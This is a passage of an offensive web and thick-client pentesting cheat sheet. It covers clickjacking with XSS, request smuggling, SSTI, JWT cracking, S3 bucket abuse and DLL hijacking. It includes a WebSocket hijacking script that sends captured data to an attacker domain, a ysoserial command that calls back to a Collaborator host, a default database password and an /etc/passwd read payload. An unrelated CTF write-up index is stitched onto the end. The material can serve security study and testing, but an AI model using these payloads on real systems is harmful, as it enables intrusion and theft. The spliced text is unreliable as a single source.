z-index: 1;
}
</style>
<div>Click me button</div>
<iframe src="$url"></iframe>
```
**Classic PoC + XSS**
```HTML
<style>
iframe {
position:relative;
width:$width_value;
height: $height_value;
opacity: $opacity;
z-index: 2;
}
div {
position:absolute;
top:$top_value;
left:$side_value;
z-index: 1;
}
</style>
<div>Click me</div>
<iframe src="$url?name=<img src=1 onerror=alert(document.domain)>&[email protected]&subject=test&message=test#feedbackResult"></iframe>
```
### <ins>DOM-based vulnerabilities</ins>
Many DOM-based vulnerabilities can be traced back to problems with the way client-side code manipulates attacker-controllable data.
- document.URL
- document.documentURI
- document.URLUnencoded
- document.baseURI
- location
- document.cookie
- document.referrer
- window.name
- history.pushState
- history.replaceState
- localStorage
- sessionStorage
- IndexedDB (mozIndexedDB, webkitIndexedDB, msIndexedDB)
- Database
| DOM-based vulnerability | Example sink |
| -------------------------------- | -------------------------- |
| DOM XSS | document.write() |
| Open redirection | window.location |
| Cookie manipulation | document.cookie |
| JavaScript injection | eval() |
| Document-domain manipulation | document.domain |
| WebSocket-URL poisoning | WebSocket() |
| Link manipulation | someElement.src |
| Web-message manipulation | postMessage() |
| Ajax request-header manipulation | setRequestHeader() |
| Local file-path manipulation | FileReader.readAsText() |
| Client-side SQL injection | ExecuteSql() |
| HTML5-storage manipulation | sessionStorage.setItem() |
| Client-side XPath injection | document.evaluate() |
| Client-side JSON injection | JSON.parse() |
| DOM-data manipulation | someElement.setAttribute() |
| Denial of service | RegExp() |
### <ins>WebSockets</ins>
Any web security vulnerability might arise in relation to WebSockets:
- User-supplied input transmitted to the server might be processed in unsafe ways, leading to vulnerabilities such as SQL injection or XML external entity injection;
- Some blind vulnerabilities reached via WebSockets might only be detectable using out-of-band (OAST) techniques;
- If attacker-controlled data is transmitted via WebSockets to other application users, then it might lead to XSS or other client-side vulnerabilities.
**Cross-site WebSocket hijacking (CSRF missing)**
```
<script>
websocket = new WebSocket('wss://websocket-URL');
websocket.onopen = start;
websocket.onmessage = handleReply;
function start(event) {
websocket.send("READY");
}
function handleReply(event) {
fetch('https://your-domain/?'+event.data, {mode: 'no-cors'});
}
</script>
```
### <ins>Insecure deserialization</ins>
How to spot Insecure deserialization
- PHP example
`O:4:"User":2:{s:4:"name":s:6:"carlos"; s:10:"isLoggedIn":b:1;}`
- Java objects always begin with the same bytes
- Hex `ac` `ed`
- Base64 `rO0`
**Ysoserial**
Because of `Runtime.exec()`, ysoserial doesn't work well with multiple commands. After some research, I found a way to run multiple sys commands anyway, by using `sh -c $@|sh . echo ` before the multiple commands that we need to run. Here I needed to run the command `host` and `whoami`:
```
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections7 'sh -c $@|sh . echo host $(whoami).<MY-'RATOR-ID>.burpcollaborator.net' | gzip | base64
```
[PHPGGC](https://github.com/ambionics/phpggc) is a library of unserialize() payloads along with a tool to generate them, from command line or programmatically.
**Burp extensions**
- [Java Deserialization Scanner](https://github.com/federicodotta/Java-Deserialization-Scanner)
- [Java Serialized Payloads](https://portswigger.net/bappstore/bc737909a5d742eab91544705c14d34f)
- [GadgetProbe](https://portswigger.net/bappstore/e20cad259d73403bba5ac4e393a8583f)
- [Freddy, Deserialization Bug Finder](https://portswigger.net/bappstore/ae1cce0c6d6c47528b4af35faebc3ab3)
- [PHP Object Injection Check](https://portswigger.net/bappstore/24dab228311049d89a27a4d721e17ef7)
### <ins>Server-side template injection</ins>
- Try fuzzing the template by injecting a sequence of special characters commonly used in template expressions, such as `${{<%[%'"}}%\`. To identify the template engine submit invalid syntax to cause an error message.
- The next step is look for the documentation to see how you can exploit the vulnerable endpoints and known vulnerabilities/exploits.
- Use payloads like these
```
{{7*7}}[[3*3]]
{{7*7}}
{{7*'7'}}
<%= 7 * 7 %>
${7*7}
${{7*7}}
@(7+7)
#{7*7}
#{ 7 * 7 }
```
**Resource**
- [Tplmap](https://github.com/epinna/tplmap) for SSTI exploitation
### <ins>Web cache poisoning</ins>
**Constructing a web cache poisoning attack**
1. Identify and evaluate unkeyed inputs
2. Elicit a harmful response from the back-end server
3. Get the response cached
**Cache key flaws**
Many websites and CDNs perform various transformations on keyed components when they are saved in the cache key:
- Excluding the query string
- Filtering out specific query parameters
- Normalizing input in keyed components
**Cache probing methodology**<br/>
1. Identify a suitable cache oracle
- Simply a page or endpoint that provides feedback about the cache's behavior. This feedback could take various forms, such as: An HTTP header that explicitly tells you whether you got a cache hit, Observable changes to dynamic content, Distinct response times
2. Probe key handling
- Is anything being excluded from a keyed component when it is added to the cache key? Common examples are excluding specific query parameters, or even the entire query string, and removing the port from the Host header.
3. Identify an exploitable gadget
- These techniques enable you to exploit a number of unclassified vulnerabilities that are often dismissed as "unexploitable" and left unpatched.
### <ins>HTTP Host header attacks</ins>
- "If someone sends a cookie called '0', automattic.com responds with a list of all 152 cookies supported by the application:
curl -v -H 'Cookie: 0=1' https://automattic.com/?cb=123 | fgrep Cookie" [[Reference](https://hackerone.com/reports/310105)];
- CRLF injection [[Reference](https://www.acunetix.com/websitesecurity/crlf-injection/)], "When you find response header injection, you can probably do better than mere XSS or open-redir. Try injecting a short Content-Length header to cause a reverse desync and exploit random live users." [[Reference](https://twitter.com/albinowax/status/1412778191119396864)]
### <ins>HTTP request smuggling</ins>
Most HTTP request smuggling vulnerabilities arise because the HTTP specification provides two different ways to specify where a request ends:
- Content-Length
```
POST /search HTTP/1.1
Host: normal-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
q=smuggling
```
- Transfer-Encoding
```
POST /search HTTP/1.1
Host: normal-website.com
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked
b
q=smuggling
0
```
Example
```
POST / HTTP/1.1
Host: smuggle-vulnerable.net
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding: chunked
0
G
```
Result: GPOST request
- Some servers do not support the Transfer-Encoding header in requests;
- Some servers that do support the Transfer-Encoding header can be induced not to process it if the header is obfuscated in some way.
Ways to obfuscate the Transfer-Encoding header
- `Transfer-Encoding: xchunked`
- `Transfer-Encoding : chunked`
- `Transfer-Encoding: chunked`
- `Transfer-Encoding: x`
- `Transfer-Encoding:[tab]chunked`
- `[space]Transfer-Encoding: chunked`
- `X: X[\n]Transfer-Encoding: chunked`
- ```
Transfer-Encoding
: chunked
```
Confirming CL.TE vulnerabilities using differential responses
```
POST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Transfer-Encoding: chunked
e
q=smuggling&x=
0
GET /404 HTTP/1.1
Foo: x
```
Result
```
GET /404 HTTP/1.1
Foo: xPOST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
q=smuggling
```
Impact
- Bypass front-end security controls
- Revealing front-end request rewriting
- Capturing other users' requests
- Using HTTP request smuggling to exploit reflected XSS
- Turn an on-site redirect into an open redirect<br/>
Example of 301 in Apache and IIS web servers
```
GET /home HTTP/1.1
Host: normal-website.com
HTTP/1.1 301 Moved Permanently
Location: https://normal-website.com/home/
```
Vulnerable request
```
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 54
Transfer-Encoding: chunked
0
GET /home HTTP/1.1
Host: attacker-website.com
Foo: X
```
Result
```
GET /home HTTP/1.1
Host: attacker-website.com
Foo: XGET /scripts/include.js HTTP/1.1
Host: vulnerable-website.com
HTTP/1.1 301 Moved Permanently
Location: https://attacker-website.com/home/
```
- Perform web cache poisoning
- Perform web cache deception
**Resource**
- [HTTP Request Smuggler](https://portswigger.net/bappstore/aaaa60ef945341e8a450217a54a11646)
### <ins>JWT Attacks</ins>
A JWT consists of a `header`, a `payload`, and a `signature`. Each part is separated by a dot.<br/>
Common attacks
- Accepting tokens with no signature
- Brute-forcing secret keys using [hashcat](https://hashcat.net/wiki/doku.php?id=frequently_asked_questions#how_do_i_install_hashcat)
- You need a valid JWT and a [wordlist](https://github.com/wallarm/jwt-secrets/blob/master/jwt.secrets.list)
- `hashcat -a 0 -m 16500 <jwt> <wordlist>`
- If any of the signatures match, hashcat will give you an output like this `<jwt>:<identified-secret>` along with other details
- Once identified the secret key, you can use it to generate a valid signature for any JWT header and payload that you like. See [Signing JWTs](https://portswigger.net/web-security/jwt/working-with-jwts-in-burp-suite#signing-jwts)
- Injecting self-signed JWTs via the `jwk`, `jku` or `kid` parameter
- Change Content-Type in `cty` to achieve XXE and deserialization attacks
- `x5c` (X.509 Certificate Chain) can lead to [CVE-2017-2800](https://talosintelligence.com/vulnerability_reports/TALOS-2017-0293) and [CVE-2018-2633](https://mbechler.github.io/2018/01/20/Java-CVE-2018-2633/)
- [JWT algorithm confusion](https://portswigger.net/web-security/jwt/algorithm-confusion)
**Resources**
- [{JWT}.{Attack}.Playbook](https://github.com/ticarpi/jwt_tool/wiki)
- [Checklist](https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology)
- [JWT Editor](https://portswigger.net/bappstore/26aaa5ded2f74beea19e2ed8345a93dd)
### <ins>OAuth authentication</ins>
How OAuth 2.0 works:
- `Client application` The website or web application that wants to access the user's data;
- `Resource owner` The user whose data the client application wants to access;
- `OAuth service provider` The website or application that controls the user's data and access to it. They support OAuth by providing an API for interacting with both an authorization server and a resource server.
**[OAuth flow](https://portswigger.net/web-security/oauth/grant-types)**
<img src="https://raw.githubusercontent.com/seeu-inspace/easyg/main/img/oauth-authorization-code-flow.jpg" alt="oauth-flow">
Following standard endpoints:
- `/.well-known/oauth-authorization-server`
- `/.well-known/openid-configuration`
Vulnerabilities in the client application
- Improper implementation of the implicit grant type
- Flawed CSRF protection
Vulnerabilities in the OAuth service
- Leaking authorization codes and access tokens
- Flawed scope validation
- Unverified user registration
### <ins>Abusing S3 Bucket Permissions</ins>
Target example: `http://[name_of_bucket].s3.amazonaws.com`
**Read Permission**
- `aws s3 ls s3://[name_of_bucket] --no-sign-request`
- `aws s3 ls s3://pyx-pkgs --recursive --human-readable --summarize`
**Write Permission**
- `aws s3 cp localfile s3://[name_of_bucket]/test_file.txt –-no-sign-request`
**READ_ACP**
- `aws s3api get-bucket-acl --bucket [bucketname] --no-sign`
- `aws s3api get-object-acl --bucket [bucketname] --key index.html --no-sign-request`
**WRITE_ACP**
- `aws s3api put-bucket-acl --bucket [bucketname] [ACLPERMISSIONS] --no-sign-request`
- `aws s3api put-object-acl --bucket [bucketname] --key file.txt [ACLPERMISSIONS] --no-sign-request`
**Tools**
- [Anonymous Cloud](https://portswigger.net/bappstore/ea60f107b25d44ddb59c1aee3786c6a1)
- [AWS CLI](https://aws.amazon.com/it/cli/)
- [S3Scanner](https://github.com/sa7mon/S3Scanner) A tool to find open S3 buckets and dump their contents
- [Cloud - AWS Pentest](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest.md)
- [s3enum](https://github.com/koenrh/s3enum)
- To find secrets, you can use [trufflehog](https://github.com/trufflesecurity/trufflehog).
**Resources**
- https://blog.yeswehack.com/yeswerhackers/abusing-s3-bucket-permissions/
- https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_examples_s3_rw-bucket.html
### <ins>Google Cloud Storage bucket</ins>
**Tools**
- [Anonymous Cloud](https://portswigger.net/bappstore/ea60f107b25d44ddb59c1aee3786c6a1)
- https://github.com/RhinoSecurityLabs/GCPBucketBrute
**Resources**
- https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
- https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/
### <ins>GraphQL</ins>
To analyze the schema: [vangoncharov.github.io/graphql-voyager/](https://ivangoncharov.github.io/graphql-voyager/) or [InQL](https://github.com/doyensec/inql) for Burp Suite.
**GraphQL Introspection query**
```
{"query": "{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"}
```
```
{query: __schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}
```
```
{"operationName":"IntrospectionQuery","variables":{},"query":"query IntrospectionQuery {\n __schema {\n queryType {\n name\n }\n mutationType {\n name\n }\n subscriptionType {\n name\n }\n types {\n ...FullType\n }\n directives {\n name\n description\n locations\n args {\n ...InputValue\n }\n }\n }\n}\n\nfragment FullType on __Type {\n kind\n name\n description\n fields(includeDeprecated: true) {\n name\n description\n args {\n ...InputValue\n }\n type {\n ...TypeRef\n }\n isDeprecated\n deprecationReason\n }\n inputFields {\n ...InputValue\n }\n interfaces {\n ...TypeRef\n }\n enumValues(includeDeprecated: true) {\n name\n description\n isDeprecated\n deprecationReason\n }\n possibleTypes {\n ...TypeRef\n }\n}\n\nfragment InputValue on __InputValue {\n name\n description\n type {\n ...TypeRef\n }\n defaultValue\n}\n\nfragment TypeRef on __Type {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n }\n }\n }\n }\n }\n }\n }\n}\n"}
```
### <ins>WordPress</ins>
- Information Disclosure [high]: `/_wpeprivate/config.json`
- Data exposure:
- `/wp-json/wp/v2/users/`
- `/wp-json/th/v1/user_generation`
- `/?rest_route=/wp/v2/users`
- xmlrpc.php enabled, [reference](https://hackerone.com/reports/138869). Send a post request to this endpoint with a body like this:
```xml
<?xml version="1.0" encoding="utf-8"?>
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
```
- Use [Nuclei](https://github.com/projectdiscovery/nuclei) to detect WordPress websites from a list of targets with: `nuclei -l subdomains.txt -t %USERPROFILE%/nuclei-templates/technologies/wordpress-detect.yaml`
- Scan with WPScan [github.com/wpscanteam/wpscan](https://github.com/wpscanteam/wpscan) with: `wpscan --url <domain> --api-token <your-api-token>`
- Nuclei templates `%USERPROFILE%\nuclei-templates\vulnerabilities\wordpress\advanced-access-manager-lfi.yaml`
**Resources**
- https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/WordPress.md
- https://www.rcesecurity.com/2022/07/WordPress-Transposh-Exploiting-a-Blind-SQL-Injection-via-XSS/
- [WordPress Checklist](https://github.com/pentesterzone/pentest-checklists/blob/master/CMS/WordPress-Checklist.md)
### <ins>IIS - Internet Information Services</ins>
- Wordlist [iisfinal.txt](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/iis-internet-information-services#iis-discovery-bruteforce)
- Check if `trace.axd` is enabled
- [Other common files](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/iis-internet-information-services#common-files)
- Search for
```
Views/web.config
bin/WebApplication1.dll
System.Web.Mvc.dll
System.Web.Mvc.Ajax.dll
System.Web.Mvc.Html.dll
System.Web.Optimization.dll
System.Web.Routing.dll
```
Reference: https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/iis-internet-information-services
### <ins>Lotus Domino</ins>
- Find Lotus Domino with nuclei: `%USERPROFILE%\nuclei-templates\technologies\lotus-domino-version.yaml`
- Exploit DB: [Lotus-Domino](https://www.exploit-db.com/search?q=Lotus+Domino)
- Fuzzing list: [SecLists/LotusNotes.fuzz.txt](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/LotusNotes.fuzz.txt)
### <ins>Git source code exposure</ins>
Once you have the source code, look for the secrets within the files. To find secrets, you can use [trufflehog](https://github.com/trufflesecurity/trufflehog).
**Other tools**
- [DotGit](https://github.com/davtur19/DotGit) find if a website has `.git` exposed
- nuclei template `%USERPROFILE%\nuclei-templates\exposures\configs\git-config.yaml`
- [GitDumper from GitTools](https://github.com/internetwache/GitTools)
### <ins>Subdomain takeover</ins>
**Tools**
- [Can I take over XYZ?](https://github.com/EdOverflow/can-i-take-over-xyz)
- nuclei template `%USERPROFILE%\nuclei-templates\takeovers`
### <ins>4** Bypass</ins>
- [byp4xx](https://github.com/lobuhi/byp4xx), s/o to [m0pam](https://twitter.com/m0pam) for the tip
- Search for subdomain with subfinder. Httpx filters subdomains with a 403 response and prints their cname. Test the cname for a bypass
`subfinder -d atg.se — silent | httpx -sc -mc 403 -cname`, s/o to [drak3hft7](https://twitter.com/drak3hft7) for the tip
- [403 Bypasser](https://portswigger.net/bappstore/444407b96d9c4de0adb7aed89e826122) Burp extension, test 403 bypasses on the run
- Replace `HTTP/n` with `HTTP/1.1`, `HTTP/2` or `HTTP/3`
- Change the request from `GET` to `POST` or viceversa
## Thick client vulnerabilities
### <ins>DLL Hijacking</ins>
**Tool**
- [Process Monitor](https://docs.microsoft.com/en-us/sysinternals/downloads/procmon) to see which DLLs are missing for an exe and do DLL Hijacking
Using Process Monitor, add these the filters to find missing dlls.<br/><br/>
<img src="https://github.com/seeu-inspace/easyg/blob/main/img/procmon-config-add.png" alt="procmon-config">
After that, insert the dll in the position of the missing ones with the same name. An example of a dll:
```c++
#include <windows.h>
BOOL WINAPI DllMain(HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
switch (dwReason)
{
case DLL_PROCESS_ATTACH:
MessageBox(NULL,
"success!!",
"pwned",
MB_ICONERROR | MB_OK
);
break;
}
return TRUE;
}
```
**Resources**
- [hijacklibs.net](https://hijacklibs.net/)
- [Save the Environment (Variable)](https://www.wietzebeukema.nl/blog/save-the-environment-variables)
### <ins>Insecure application design</ins>
The application design is based on a two-tier architecture. In particular, the thick client application installed on the workstation communicates directly with a backend DBMS without the use of an application server.
The best option, from a security perspective, is designing and implementing a three-tier architecture in which the thick client connects with an intermediary layer (an application server), which in turn communicates with the database. A secure channel must be used for all communications, with only secure protocols (such TLS, HTTPS, etc.), and preferebli with Certificate Pinning.
If this is not possible, it is desirable to provide read-only users and read/write users distinct privileges at the DBMS layer. This would stop vertical privilege escalation even if a read-only user were to access the database directly and try to edit the data.
### <ins>Weak Hashing Algorithms</ins>
Sensitive data exposure, key leakage, broken authentication, insecure sessions, and spoofing attacks can all be caused by improper application of encryption methods. Some hashing or encryption techniques, such MD5 and RC4, are known to be insecure and are not advised for use.
When dealing with hashing algorithms, the strongest algorithm available should be used (e.g., SHA-512 or at least SHA-256). However, it is always crucial to take into account the precise context in which the hashing algorithm must be used. For instance, it is recommended to utilize contemporary hashing algorithms that have been created especially for securely saving passwords when managing passwords. This indicates that they should be slow (as opposed to fast algorithms like MD5 and SHA-1), and that can be configured by changing the work factor (e.g., PBKDF2 or Bcrypt)
If not configured correctly, the encryption can be not sufficiently secure. An example with AES, an algorithm for symmetric encryption:
- Cipher-Block-Chaining (CBC) is no longer considered safe when verifiable padding has been applied without first ensuring the integrity of the ciphertext, except for very specific circumstances. If implemented, it can weakens AES encryption.
### <ins>Cleartext secrets in memory</ins>
The memory analysis of an application, done when the thick client process is running, can highlight the presence of secrets in cleartext and that can be therefore extracted by any user having access to the machine where the application is hosted.
**Resource**
- [Process Hacker](https://processhacker.sourceforge.io/) It helps to dump the exe memory and see what sensitive data is there
### <ins>Hardcoded secrets</ins>
Sometimes, the thick client application's source code is not obfuscated, therefore a hostile user may decompile it and easily comprehend every functionality of the application. It's also possible that more can be found, like credentials and api keys.
**Resources**
- [VB Decompiler](https://www.vb-decompiler.org/products.htm) decompile a VB application
- [ILSpy](https://github.com/icsharpcode/ILSpy) | [dnSpy](https://github.com/dnSpy/dnSpy) .NET decompilers
### <ins>Unsigned binaries</ins>
If an application executable, and/or the imported DLLs, has not been digitally signed, it's possible replace it with a tampered version without the user noticing.
**Resource**
- [Sigcheck](https://docs.microsoft.com/en-us/sysinternals/downloads/sigcheck) check the signature of an executable
### <ins>Lack of verification of the server certificate</ins>
Due to the fact that the client does not verify the TLS certificate presented by the back-end, it's possible to intercept also HTTPS communications managed by the thick client application.
Without effective certificate control, an attacker who is capable of conducting a Man in the Middle attack can provide a self-signed certificate and the application will accept it, invalidating the protection provided by the TLS connection.
### <ins>Insecure SSL/TLS configuration</ins>
During the SSL/TLS negotiation, SSL/TLS connections may be set up to offer outdated protocols and cipher suites that are susceptible to known security flaws. The data transmitted between the server and the client could potentially be read or modified in this case if an attacker is able to intercept the communication.
**Resource**
- [testssl.sh](https://testssl.sh/) useful for checking outdated ciphers & more
### <ins>Remote Code Execution via Citrix Escape</ins>
If Citrix is present and you have access to it, there are multiple ways you can achieve Remote Code Execution:
- Try to upload a PowerShell
- Search for a functionality that opens a dialog box. Insert the path for `cmd` and `PowerShell` and see if they pop-up
- In a dialog box, see if the right-click is allowed. Play with the functionality to achieve RCE, like creating a `.bat` and running it or upload files
- Upload [Process Hacker](https://processhacker.sourceforge.io/) and see if you find [Cleartext secrets in memory](#cleartext-secrets-in-memory)
**Resources**
- [PowerShell](https://github.com/PowerShell/Powershell)
- [Two RCEs are better than one: write-up of an interesting lateral movement](https://medium.com/@seeu-inspace/two-rces-are-better-than-one-write-up-of-an-interesting-lateral-movement-66a52d42e075)
### <ins>Direct database access</ins>
- If it's found that standard users have direct access to the database, there is the possibility for users to read and write data that is not otherwise accessible through the client application.
- If the SQL server requires a Windows User access, use the command `runas /user:localadmin <SQL-SERVER-MANAGEMENT-STUDIO>`
- Try access with the account `sa:RPSsql12345`
- Intercept the requests and see if there is an [Insecure application design](#insecure-application-design). In that case, it might be possible to perform a Direct database access, SQLi or Remote Code Execution
**Resources**
- [Echo Mirage](https://resources.infosecinstitute.com/topic/echo-mirage-walkthrough/)
- [Wireshark](https://www.wireshark.org/)
### <ins>Insecure Windows Service permissions</ins>
Windows service executable might be configured with insecure permissions. Services configured to use an executable with weak permissions are vulnerable to privilege escalation attacks.
Unprivileged users have the ability to change or replace the executable with arbitrary code, which would then be run the following time the service is launched. This can lead to privilege escalation depending on the user the service is running as.
### <ins>Code injection</ins>
- Check for classic HTML injections and [XSS](cross-site-scripting-xss)
- Try to use a `SSID` as a vector for an XSS
- Check if `<webview>` works. If it does, it's might be possible to achieve a LFI with a payload like this `<webview src="file:///etc/passwd"></webview>`. [[Reference](https://medium.com/@renwa/facebook-messenger-desktop-app-arbitrary-file-read-db2374550f6d)]
|
### CTF-Challenges-Machines-Writeups-Walkthroughs
WriteUps/ Walkthroughs for CTF challenges or machines
- Twitter [@1r0Dm48O](https://twitter.com/1r0Dm48O)
| Challenge/Machine | Writeup/Walkthrough | MD5 | Posted On |
| ------------ | ------------ | ------------ | ------------ |
| [Hc0n2020-b00t2root-Machine-User-Flag](https://ctf.h-c0n.com/challenges#) | [Walkthrough h-c0n Machine User](https://github.com/1r0dm480/CTF-Wr1T3uPs/blob/master/hc0n2020/boot2root/Machine_User_Flag/h-c0n-Machine-User_flag-Walkthrough-1v4n.pdf) | [ c0162d01c331ac5f74303e9c2ac481f3](https://www.virustotal.com/gui/file/382d2b2893ba7571472c9158502a97b9e38e53b03e7aa79050ed72d16942a5ed/details) | [h-c0n qualifier CTF 2020 boot2root Walkthrough: Machine (User flag)](https://honeysec.blogspot.com/2020/06/h-c0n-qualifier-ctf-2020-boot2root.html) |
| [Hc0n2020-Samurai](https://ctf.h-c0n.com/challenges#Samurai) | [Writeup-Stego-Samurai](https://github.com/1r0dm480/CTF-Wr1T3uPs/tree/master/hc0n2020/stego/samurai) | [VT URL Scan](https://www.virustotal.com/gui/url-analysis/u-070aa53933ae00dbaf7ed3e225bf697b7d69476c2a0667690c5f7b98ed5e4c00-1583616378/detection) | [Honey Sec - Hc0n2020prequals - Challenges - Samurai](https://honeysec.blogspot.com/2020/02/hc0n2020prequals-challenges-samurai-1v4n.html) |
| [Hc0n2020-prequals-Ok, I got this](https://ctf.h-c0n.com/challenges#Ok,%20I%20got%20this) | [Writeup-Radio-Ok_I_got_this](https://github.com/1r0dm480/CTF-Wr1T3uPs/tree/master/hc0n2020/Radio/Ok_I_got_this) | [VT URL Scan](https://www.virustotal.com/gui/url/1d8022e610a9b7cc008799375db3d242c3097fcf2e6db124f62469943dd032b4/detection) | [Hc0n2020-prequals-writeups](https://www.h-c0n.com/p/ctf.html#writeupsqualifier) |
| [Hc0n2020-prequals-Weird Sanity Check](https://ctf.h-c0n.com/challenges#Weird%20Sanity%20Check) | [Writeup-wellcome-Weird Sanity](https://github.com/1r0dm480/CTF-Wr1T3uPs/tree/master/hc0n2020/wellcome/Weird_Sanity_Check) | [VT URL Scan](https://www.virustotal.com/gui/url/1d8022e610a9b7cc008799375db3d242c3097fcf2e6db124f62469943dd032b4/detection) | [Hc0n2020-prequals-writeups](https://www.h-c0n.com/p/ctf.html#writeupsqualifier) |
| [Hc0n2020-prequals-Baby Malicious](https://ctf.h-c0n.com/challenges#Baby%20malicious) | [Writeup-Forense-Baby_Malicious](https://github.com/1r0dm480/CTF-Wr1T3uPs/tree/master/hc0n2020/Forense/Baby_maliciosus) | [VT URL Scan](https://www.virustotal.com/gui/url/a027a041d96d8ee9c6ba9ffefc0f670c2ed6716a4a601fae87e5daa40e1c6101/detection) | [Hc0n2020-prequals-writeups](https://www.h-c0n.com/p/ctf.html#writeupsqualifier) |
| [Hc0n2020-prequals-Crypto-Kojo_No_Mai](https://ctf.h-c0n.com/challenges#Kojo%20No%20Mai) | [Writeup-Crypto-Kojo-No-Mai](https://github.com/1r0dm480/CTF-Wr1T3uPs/tree/master/hc0n2020/Crypto/Kojo_No_Mai) | [VT URL Scan](https://www.virustotal.com/gui/url/e91c05e8a43b2c39987980cb5e7049a8d28ff04bbfd2fb23c939374f6c767eec/detection) | [Hc0n2020-prequals-writeups](https://www.h-c0n.com/p/ctf.html#writeupsqualifier) |
| [JASYPCTF19-Reversing-Reversing1](https://ctf.interferencias.tech/challenges#Reversing%201) | [Writeup-Reversing-Reversing1](https://github.com/1r0dm480/CTF-Wr1T3uPs/tree/master/JASYPCTF19/reversing/reversing1) | [VT URL Scan](https://www.virustotal.com/gui/url/50bee016447d76305ce00bf5e294ce50a30fd312b9e75792b6e1d9ec69daf903/) | [Honey Sec WRITEUP - JASYP19 - Challenges - Reversing 1](https://honeysec.blogspot.com/2020/02/jasyp19-challenges-reversing-1.html) |
| [peaCTF2019-Forensics-Pokemon](https://2019.peactf.com/problems) | [Writeup-Pokemon-1v4n](https://github.com/1r0dm480/CTF-Wr1T3uPs/tree/master/peaCTF2019/Forensics/Pokemon) | [VT URL Scan](https://www.virustotal.com/gui/url/650bbdd0e2ba47daafa02ac345aa9e6d9aa836b422c85738c304cfb97d171ace/details) | [CTFTime-Pokemon-1v4n](https://ctftime.org/writeup/17883) |
| [peaCTF2019-Crypto-Crackthekey](https://2019.peactf.com/problems) | [Writeup-Crackthekey-1v4n](https://github.com/1r0dm480/CTF-Wr1T3uPs/tree/master/peaCTF2019/crypto/Crackthekey) | [VT URL Scan](https://www.virustotal.com/gui/url/b82a85923735461f8cae731ca45671adaaadcd185881feaffb92c5c8e8790554/details) | [CTFTime-Crackthekey-1v4n](https://ctftime.org/writeup/17876) |
| [peaCTF2019-Crypto-School](https://2019.peactf.com/problems) | [Writeup-School-1v4n](https://github.com/1r0dm480/CTF-Wr1T3uPs/tree/master/peaCTF2019/crypto/School) | [VT URL Scan](https://www.virustotal.com/gui/url/5757b17e2e74fc922b3c9f725c106fc328636955ef657ae9c6f0c0b41df1ee1e/detection) | [CTFTime-School-1v4n](https://ctftime.org/writeup/17342) |
| [peaCTF2019-Crypto-Broken Keyboard](https://2019.peactf.com/problems) | [Writeup-Broken Keyboard-1v4n](https://github.com/1r0dm480/CTF-Wr1T3uPs/tree/master/peaCTF2019/crypto/Broken_Keyboard) | [VT URL Scan](https://www.virustotal.com/gui/url/1e1ed304865fb71740222c11ccf77d3e8185b90f4ded21500529f14875532bb4/detection) | [CTFTime-Broken Keyboard-1v4n](https://ctftime.org/writeup/17341) |
| [peaCTF2019-Crypyo-Breakfast](https://2019.peactf.com/problems) | [Writeup-Breakfast-1v4n](https://github.com/1r0dm480/CTF-Wr1T3uPs/tree/master/peaCTF2019/crypto/Breakfast) | [VT URL Scan](https://www.virustotal.com/gui/url/3e13a71eda4c5e47c36fa3eacbe3feb4772969c95882ac69e2b71a9270a4d604/detection) | [CTFTime-Brekfast-1v4n](https://ctftime.org/writeup/17342) |
| [shs2k19CTF-Reversing-Rev03](http://ctf.securityhighschool.es/challenges?category=reversing) | [Writeup-Rev03-1v4n](https://github.com/1r0dm480/CTF-Wr1T3uPs/tree/master/shs2k19CTF/rev/rev03) | [VT URL Scan](https://www.virustotal.com/gui/url/0a5a9f15265026ab612cdf55f4bae781910aa5d074b264550f9d8aaef528482f/detection) | |
| [shs2k19CTF-Reversing-Rev01](http://ctf.securityhighschool.es/challenges?category=reversing) | [Writeup-Rev01-1v4n](https://github.com/1r0dm480/CTF-Wr1T3uPs/tree/master/shs2k19CTF/rev/rev01) | [VT URL Scan](https://www.virustotal.com/gui/url/eb239a6cf2529076ce31c4375326a1ffccfd8f0e00e4b6241aabbc9c23c52b78/detection) | |
